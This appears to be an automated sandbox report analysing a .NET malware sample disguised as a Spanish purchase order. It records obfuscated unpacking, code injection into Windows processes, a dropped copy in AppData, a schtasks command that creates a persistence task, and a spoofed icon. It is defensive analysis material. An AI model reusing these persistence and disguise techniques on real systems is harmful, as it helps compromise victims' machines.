          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: Orden de compra 0307AR24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Orden de compra 0307AR24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: systray.pdb source: RegSvcs.exe, 00000009.00000002.2215867045.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2215792659.0000000001390000.00000040.10000000.00040000.00000000.sdmp, systray.exe, systray.exe, 0000000E.00000002.4548836060.0000000000210000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2215867045.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2215792659.0000000001390000.00000040.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4548836060.0000000000210000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb, source: explorer.exe, 0000000A.00000002.4559537776.0000000010EBF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000507F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4549290309.0000000002C47000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2215786953.00000000047D5000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2217606018.0000000004987000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004CCE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2316492192.0000000004347000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2319355530.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.000000000483E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, systray.exe, systray.exe, 0000000E.00000003.2215786953.00000000047D5000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 0000000E.00000003.2217606018.0000000004987000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 0000000E.00000002.4550138239.0000000004CCE000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2316492192.0000000004347000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.00000000046A0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000015.00000003.2319355530.00000000044FA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000015.00000002.2321470053.000000000483E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: RegSvcs.exe, 00000011.00000002.2317311664.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2322712335.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000015.00000002.2320740749.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: RegSvcs.exe, 00000011.00000002.2317311664.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2322712335.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, rundll32.exe, 00000015.00000002.2320740749.00000000000B0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: RegSvcs.pdb source: explorer.exe, 0000000A.00000002.4559537776.0000000010EBF000.00000004.80000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4550643558.000000000507F000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000E.00000002.4549290309.0000000002C47000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          .NET source code contains potential unpacker
          Source: 0.2.Orden de compra 0307AR24.exe.2dcbbd8.0.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.2dcbbd8.0.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.8f00000.5.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.8f00000.5.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.cs.Net Code: HkBkBXA9QR System.Reflection.Assembly.Load(byte[])
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.cs.Net Code: HkBkBXA9QR System.Reflection.Assembly.Load(byte[])
          Source: 11.2.RggSaCWUvAyNK.exe.2adbbb0.0.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
          Source: 11.2.RggSaCWUvAyNK.exe.2adbbb0.0.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B7169 push 8BBCEB50h; ret 0_2_058B716F
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeCode function: 0_2_058B3B7D push esp; retf 0_2_058B3B84
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417968 pushfd ; retf 9_2_0041796A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004191A3 push di; retf 9_2_004191A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00416479 push ebp; ret 9_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041640A push ebp; ret 9_2_00416450
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041D4B5 push eax; ret 9_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041D56C push eax; ret 9_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041D502 push eax; ret 9_2_0041D508
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041D50B push eax; ret 9_2_0041D572
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417D1E push esp; ret 9_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417D3C push esp; ret 9_2_00417D32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00417655 push esi; iretd 9_2_00417656
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041760D push esi; retf 9_2_0041761D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0183225F pushad ; ret 9_2_018327F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018327FA pushad ; ret 9_2_018327F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018609AD push ecx; mov dword ptr [esp], ecx9_2_018609B6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0183283D push eax; iretd 9_2_01832858
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01831368 push eax; iretd 9_2_01831369
          Source: C:\Windows\explorer.exeCode function: 10_2_103609B5 push esp; retn 0000h10_2_10360AE7
          Source: C:\Windows\explorer.exeCode function: 10_2_10360B1E push esp; retn 0000h10_2_10360B1F
          Source: C:\Windows\explorer.exeCode function: 10_2_10360B02 push esp; retn 0000h10_2_10360B03
          Source: C:\Windows\explorer.exeCode function: 10_2_10477B02 push esp; retn 0000h10_2_10477B03
          Source: C:\Windows\explorer.exeCode function: 10_2_10477B1E push esp; retn 0000h10_2_10477B1F
          Source: C:\Windows\explorer.exeCode function: 10_2_104779B5 push esp; retn 0000h10_2_10477AE7
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC99B5 push esp; retn 0000h10_2_10AC9AE7
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC9B02 push esp; retn 0000h10_2_10AC9B03
          Source: C:\Windows\explorer.exeCode function: 10_2_10AC9B1E push esp; retn 0000h10_2_10AC9B1F
          Source: C:\Windows\explorer.exeCode function: 10_2_10C139B5 push esp; retn 0000h10_2_10C13AE7
          Source: C:\Windows\explorer.exeCode function: 10_2_10C13B02 push esp; retn 0000h10_2_10C13B03
          Source: C:\Windows\explorer.exeCode function: 10_2_10C13B1E push esp; retn 0000h10_2_10C13B1F
          Source: Orden de compra 0307AR24.exeStatic PE information: section name: .text entropy: 7.825436593603401
          Source: RggSaCWUvAyNK.exe.0.drStatic PE information: section name: .text entropy: 7.825436593603401
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, yfmjb7ceHqUt4QUJFL.csHigh entropy of concatenated method names: 'SDYIPX87ck', 'BNJIsf39tc', 'XpyIr8quqb', 'iSFI7AnWkO', 'KWjITMCREE', 'zvRItBdrNG', 'hYtI0b4gLC', 'kT5IFk0jwx', 'j3GIXWGea6', 'JrRIfQjelB'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, KR7mpiyPDHBbEyi5xw.csHigh entropy of concatenated method names: 'ujQN1yJfYq', 'dWnNZYr3PZ', 'LD5NuPTvky', 'rALNLkJOyN', 'ymJNIUma8R', 'AL3N44TK3L', 'LcFNJXAxWW', 'FI6N6RTpoH', 'CXpNafqSkH', 'JxmNcRYfmi'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, Q6M94gYctVNtw3H796.csHigh entropy of concatenated method names: 'eSYAWuceOp', 'WiJAQI2aBF', 'K9RAifD83i', 'YH5ANJeqdE', 'LtVAd9lWYU', 'wcFAVCSoEM', 'umjAO4N4LD', 'UclAD8xZOc', 'bR3AYpcmS4', 'e34AGrZWYt'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, TTQDNta7IG5WrwHC6T.csHigh entropy of concatenated method names: 's3bhuRXyR0', 'eithL2aBl0', 'QevhHBqaYD', 'VEAhTm4GYx', 'eeBh0l0goF', 'pIshFchIdQ', 'CefhfeH1Kn', 'hfDhwyC7AS', 'f2XhP8KsRJ', 'WIqhqpYfoN'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, p6pIYykcilRMsV2VCx.csHigh entropy of concatenated method names: 'Dispose', 'XfXpbRmaRT', 'Aum5TTPJwy', 'tlIMM1jWug', 'd7BpEe3VAW', 'qEApzdp7Lf', 'ProcessDialogKey', 'BgZ5l8CxrG', 'xs05pMipEr', 'loZ55Cl50k'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, rbUGKPdyxBn8XOMxeW.csHigh entropy of concatenated method names: 'VgxpOMMvMu', 'rdEpDOVclU', 'JMdpGJencS', 'uHXp20uDol', 'vkUpIMvStN', 'bdAp4ck0se', 'cEVewwmfPwwxTThCZu', 'FwEnrbJdJHLESc6aRs', 'YiP9RC4wVQtAA37gt8', 'aGYppAeOlb'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, BX7Oh87HgOpmOCUgmK.csHigh entropy of concatenated method names: 'ugBVWkkpT5', 'H9NViAaiPK', 'NXTVdBEwwu', 'S52VODLvZb', 'JmdVDdsxhV', 'Tb8dKKbFtV', 'lo4dRvVNjp', 'MdWdnZib9o', 'NaudxNYFbc', 'zFudb1iBpx'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, gRDoByRGLPp6pfTSjP.csHigh entropy of concatenated method names: 'ToString', 'rvE4qvLY6R', 'khb4TYRw8f', 'H0L4tFaKsH', 'Cu640lWBg1', 'QXt4FTXLbl', 'faq4XOL1T3', 'hnn4f0ylIC', 'xhy4wTiiAu', 'T3W43XyVkB'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, FgUxusEcU0DJni7hio.csHigh entropy of concatenated method names: 'nHCapYxVtC', 'mEraA61SYy', 'XWUakQj45J', 'NsWaQRCgDD', 'ClSairB5Dr', 'dgMadBnIxb', 'lCmaVoISjm', 'rOk6nI3oYP', 'y5Z6xVBHMN', 'VDy6bUiUtv'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, MYu7nQer9A19NAow7R.csHigh entropy of concatenated method names: 'Ouh6HDTOKF', 'Sxi6TQJAW6', 'T9t6t3pEXO', 'vi960uLyjl', 'col6re3wNn', 'r8y6Fb1n02', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, pqLWAeIFMHg90ZR9dd.csHigh entropy of concatenated method names: 'SET6QHE2sp', 'Ukm6ivL5V9', 'Jd96NNTFdB', 'tfh6dnj0m0', 'J7x6VI8Elg', 'TVD6ORYDiJ', 'AZ56De0ZrW', 'XPP6YTVe6g', 'wKG6GUNRtT', 'xuh62DoTBG'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, H6UpB055KFgdieio2Y.csHigh entropy of concatenated method names: 'drcB3Gc4N', 'SV31xKnkg', 'XKyZZEGoW', 'wxwUFrNq3', 'EpDLfl0Oy', 'pE5eMtIv1', 'sQNNXVl5cJH0cTlllG', 'G4HsJbqZ7bhNUn5E2q', 'eU56dPrAY', 'Rf1crE3D0'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, ke8rrUqlPToXKD2OoAB.csHigh entropy of concatenated method names: 're1ag1DvMl', 'Gnga957x3S', 'PJnaBy5oA7', 'L3pa1By8oC', 'YJjamLcDft', 'M2yaZUGqtL', 'amJaUHNFq1', 'HJBauKGweV', 'e7OaLe7FM2', 'AHAaertwAW'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, lMbMGb1ov4L67EScwT.csHigh entropy of concatenated method names: 'qyjdmcq0nx', 'i6kdUKGeVh', 'MTONtnpNVT', 'CNhN0nCfRx', 'jFPNFAsiQp', 'EWJNXoj2Zx', 'JZLNfMxOVT', 'fj3NwtG5a6', 'fDGN35HXol', 'OUBNP6iDvL'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, p3BRIyqACRVJVwwLupF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KndcrtY3eQ', 'jhsc7B8UL4', 'JcIcoZUshU', 'Xh7cyWKkjg', 'J6ccKRjpX5', 'zajcR6UEjA', 'RZBcng6ekg'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, MVHEAJo8kttD6FRHt3.csHigh entropy of concatenated method names: 'SO1JxBf6Nc', 'NeHJEHN6IB', 'S7A6lQCogt', 'OGg6phFoGy', 'vVCJqMfBrG', 'yuhJs6X8pD', 'e1jJSOQwxg', 'DcxJrSLwD8', 'TrPJ7a8BvV', 'FDoJof6U6x'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, JvN7hpwJnm4gTu1HXw.csHigh entropy of concatenated method names: 'bg2ira8xAf', 'K9ii7C1WDr', 'GwiiobLimw', 'uZGiy4s6SX', 'IKGiKHxTNi', 'bOLiRq8jLr', 'ddKinNpVqw', 'R7pixb6DUs', 'hnwibfXYAV', 'UdQiEYkguV'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, At3TF1qqjpsJPSavYm6.csHigh entropy of concatenated method names: 'ToString', 'HI0cApWfGL', 'Ewrcko6NvW', 'GNMcWtoOw6', 'CdncQk0Fdu', 'rcyci85U5o', 'YSmcNQRqS7', 'DgAcd2OJZ9', 'KFs1ZmxmbbKSvWwlW5E', 'Dq7qesxY81p36jLv2Be'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, cZEEvxCghWIf3R5N2R.csHigh entropy of concatenated method names: 'KDbOgY8WIB', 'HQNO9vHDMx', 'w8sOBsgEUd', 'mGfO1X1IYu', 'OMqOmuBjNZ', 'CnwOZ9NEsZ', 'YfdOUTO7x3', 'c5ROut5dBa', 'A5uOL3jQ7U', 'gNHOep2Rrr'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, KcAG6fzCKy4Xjm1vtr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SUnahLSYhe', 'hATaIVV1OL', 'aULa4Jgq5Q', 'MItaJL3xAW', 'OwGa6xSpM1', 'egbaaK8N5G', 'VJCacMjo0o'
          Source: 0.2.Orden de compra 0307AR24.exe.4952790.2.raw.unpack, iIt1ZQbm28ELpKbSuJ.csHigh entropy of concatenated method names: 'kf6OQPVlPC', 'ECcONJ1HSC', 'fpoOVedEWp', 'V7YVEeGnCZ', 'h0SVzaQSdG', 'iNxOluOAtZ', 'uiPOpp3gF9', 'HaqO5u4jDU', 'ypIOAVM4T0', 'iZkOkJIsWJ'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, yfmjb7ceHqUt4QUJFL.csHigh entropy of concatenated method names: 'SDYIPX87ck', 'BNJIsf39tc', 'XpyIr8quqb', 'iSFI7AnWkO', 'KWjITMCREE', 'zvRItBdrNG', 'hYtI0b4gLC', 'kT5IFk0jwx', 'j3GIXWGea6', 'JrRIfQjelB'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, KR7mpiyPDHBbEyi5xw.csHigh entropy of concatenated method names: 'ujQN1yJfYq', 'dWnNZYr3PZ', 'LD5NuPTvky', 'rALNLkJOyN', 'ymJNIUma8R', 'AL3N44TK3L', 'LcFNJXAxWW', 'FI6N6RTpoH', 'CXpNafqSkH', 'JxmNcRYfmi'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, Q6M94gYctVNtw3H796.csHigh entropy of concatenated method names: 'eSYAWuceOp', 'WiJAQI2aBF', 'K9RAifD83i', 'YH5ANJeqdE', 'LtVAd9lWYU', 'wcFAVCSoEM', 'umjAO4N4LD', 'UclAD8xZOc', 'bR3AYpcmS4', 'e34AGrZWYt'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, TTQDNta7IG5WrwHC6T.csHigh entropy of concatenated method names: 's3bhuRXyR0', 'eithL2aBl0', 'QevhHBqaYD', 'VEAhTm4GYx', 'eeBh0l0goF', 'pIshFchIdQ', 'CefhfeH1Kn', 'hfDhwyC7AS', 'f2XhP8KsRJ', 'WIqhqpYfoN'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, p6pIYykcilRMsV2VCx.csHigh entropy of concatenated method names: 'Dispose', 'XfXpbRmaRT', 'Aum5TTPJwy', 'tlIMM1jWug', 'd7BpEe3VAW', 'qEApzdp7Lf', 'ProcessDialogKey', 'BgZ5l8CxrG', 'xs05pMipEr', 'loZ55Cl50k'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, rbUGKPdyxBn8XOMxeW.csHigh entropy of concatenated method names: 'VgxpOMMvMu', 'rdEpDOVclU', 'JMdpGJencS', 'uHXp20uDol', 'vkUpIMvStN', 'bdAp4ck0se', 'cEVewwmfPwwxTThCZu', 'FwEnrbJdJHLESc6aRs', 'YiP9RC4wVQtAA37gt8', 'aGYppAeOlb'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, BX7Oh87HgOpmOCUgmK.csHigh entropy of concatenated method names: 'ugBVWkkpT5', 'H9NViAaiPK', 'NXTVdBEwwu', 'S52VODLvZb', 'JmdVDdsxhV', 'Tb8dKKbFtV', 'lo4dRvVNjp', 'MdWdnZib9o', 'NaudxNYFbc', 'zFudb1iBpx'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, gRDoByRGLPp6pfTSjP.csHigh entropy of concatenated method names: 'ToString', 'rvE4qvLY6R', 'khb4TYRw8f', 'H0L4tFaKsH', 'Cu640lWBg1', 'QXt4FTXLbl', 'faq4XOL1T3', 'hnn4f0ylIC', 'xhy4wTiiAu', 'T3W43XyVkB'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, FgUxusEcU0DJni7hio.csHigh entropy of concatenated method names: 'nHCapYxVtC', 'mEraA61SYy', 'XWUakQj45J', 'NsWaQRCgDD', 'ClSairB5Dr', 'dgMadBnIxb', 'lCmaVoISjm', 'rOk6nI3oYP', 'y5Z6xVBHMN', 'VDy6bUiUtv'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, MYu7nQer9A19NAow7R.csHigh entropy of concatenated method names: 'Ouh6HDTOKF', 'Sxi6TQJAW6', 'T9t6t3pEXO', 'vi960uLyjl', 'col6re3wNn', 'r8y6Fb1n02', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, pqLWAeIFMHg90ZR9dd.csHigh entropy of concatenated method names: 'SET6QHE2sp', 'Ukm6ivL5V9', 'Jd96NNTFdB', 'tfh6dnj0m0', 'J7x6VI8Elg', 'TVD6ORYDiJ', 'AZ56De0ZrW', 'XPP6YTVe6g', 'wKG6GUNRtT', 'xuh62DoTBG'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, H6UpB055KFgdieio2Y.csHigh entropy of concatenated method names: 'drcB3Gc4N', 'SV31xKnkg', 'XKyZZEGoW', 'wxwUFrNq3', 'EpDLfl0Oy', 'pE5eMtIv1', 'sQNNXVl5cJH0cTlllG', 'G4HsJbqZ7bhNUn5E2q', 'eU56dPrAY', 'Rf1crE3D0'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, ke8rrUqlPToXKD2OoAB.csHigh entropy of concatenated method names: 're1ag1DvMl', 'Gnga957x3S', 'PJnaBy5oA7', 'L3pa1By8oC', 'YJjamLcDft', 'M2yaZUGqtL', 'amJaUHNFq1', 'HJBauKGweV', 'e7OaLe7FM2', 'AHAaertwAW'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, lMbMGb1ov4L67EScwT.csHigh entropy of concatenated method names: 'qyjdmcq0nx', 'i6kdUKGeVh', 'MTONtnpNVT', 'CNhN0nCfRx', 'jFPNFAsiQp', 'EWJNXoj2Zx', 'JZLNfMxOVT', 'fj3NwtG5a6', 'fDGN35HXol', 'OUBNP6iDvL'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, p3BRIyqACRVJVwwLupF.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KndcrtY3eQ', 'jhsc7B8UL4', 'JcIcoZUshU', 'Xh7cyWKkjg', 'J6ccKRjpX5', 'zajcR6UEjA', 'RZBcng6ekg'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, MVHEAJo8kttD6FRHt3.csHigh entropy of concatenated method names: 'SO1JxBf6Nc', 'NeHJEHN6IB', 'S7A6lQCogt', 'OGg6phFoGy', 'vVCJqMfBrG', 'yuhJs6X8pD', 'e1jJSOQwxg', 'DcxJrSLwD8', 'TrPJ7a8BvV', 'FDoJof6U6x'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, JvN7hpwJnm4gTu1HXw.csHigh entropy of concatenated method names: 'bg2ira8xAf', 'K9ii7C1WDr', 'GwiiobLimw', 'uZGiy4s6SX', 'IKGiKHxTNi', 'bOLiRq8jLr', 'ddKinNpVqw', 'R7pixb6DUs', 'hnwibfXYAV', 'UdQiEYkguV'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, At3TF1qqjpsJPSavYm6.csHigh entropy of concatenated method names: 'ToString', 'HI0cApWfGL', 'Ewrcko6NvW', 'GNMcWtoOw6', 'CdncQk0Fdu', 'rcyci85U5o', 'YSmcNQRqS7', 'DgAcd2OJZ9', 'KFs1ZmxmbbKSvWwlW5E', 'Dq7qesxY81p36jLv2Be'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, cZEEvxCghWIf3R5N2R.csHigh entropy of concatenated method names: 'KDbOgY8WIB', 'HQNO9vHDMx', 'w8sOBsgEUd', 'mGfO1X1IYu', 'OMqOmuBjNZ', 'CnwOZ9NEsZ', 'YfdOUTO7x3', 'c5ROut5dBa', 'A5uOL3jQ7U', 'gNHOep2Rrr'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, KcAG6fzCKy4Xjm1vtr.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SUnahLSYhe', 'hATaIVV1OL', 'aULa4Jgq5Q', 'MItaJL3xAW', 'OwGa6xSpM1', 'egbaaK8N5G', 'VJCacMjo0o'
          Source: 0.2.Orden de compra 0307AR24.exe.4da0000.3.raw.unpack, iIt1ZQbm28ELpKbSuJ.csHigh entropy of concatenated method names: 'kf6OQPVlPC', 'ECcONJ1HSC', 'fpoOVedEWp', 'V7YVEeGnCZ', 'h0SVzaQSdG', 'iNxOluOAtZ', 'uiPOpp3gF9', 'HaqO5u4jDU', 'ypIOAVM4T0', 'iZkOkJIsWJ'
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeFile created: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeJump to dropped file

          Boot Survival

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RggSaCWUvAyNK" /XML "C:\Users\user\AppData\Local\Temp\tmp362B.tmp"

          Hooking and other Techniques for Hiding and Protection

          barindex
          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: icon (2112).png
          Loading BitLocker PowerShell Module
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
